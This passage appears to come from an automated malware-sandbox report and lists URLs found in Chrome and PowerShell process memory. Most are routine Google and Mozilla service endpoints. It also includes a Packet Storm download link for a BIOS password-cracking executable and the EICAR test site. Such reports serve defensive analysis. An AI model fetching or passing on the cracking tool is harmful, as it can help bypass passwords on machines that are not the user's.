                    Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288715813.0000781C02898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.godaddy.com/go/checkout
                    Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                    Source: chrome.exe, 00000009.00000002.57291415985.0000781C02C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
                    Source: chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286673291.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291047704.0000781C02BF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290972415.0000781C02BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: chrome.exe, 00000009.00000002.57300353725.0000781C03920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301057032.0000781C03A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: chrome.exe, 00000009.00000003.57225189488.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228863428.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229281440.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225142821.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                    Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                    Source: chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/p_
                    Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                    Source: chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                    Source: chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/p_
                    Source: chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                    Source: chrome.exe, 00000009.00000003.57207536482.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286673291.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C0243C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                    Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                    Source: chrome.exe, 00000009.00000003.57195109940.00002988000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57195233699.00002988000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                    Source: chrome.exe, 00000009.00000003.57207536482.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286673291.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291047704.0000781C02BF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286243076.0000781C02368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287514613.0000781C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290972415.0000781C02BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                    Source: chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                    Source: chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                    Source: chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com/
                    Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
                    Source: powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/593024
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/650547
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/655534
                    Source: chrome.exe, 00000009.00000002.57295431984.0000781C032C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
                    Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
                    Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                    Source: chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                    Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                    Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                    Source: chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                    Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                    Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                    Source: chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                    Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
                    Source: chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229087385.0000781C026F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293627577.0000781C03004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                    Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                    Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eicar.org/
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                    Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: powershell.exe, 00000003.00000002.56217685265.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                    Source: chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
                    Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                    Source: chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
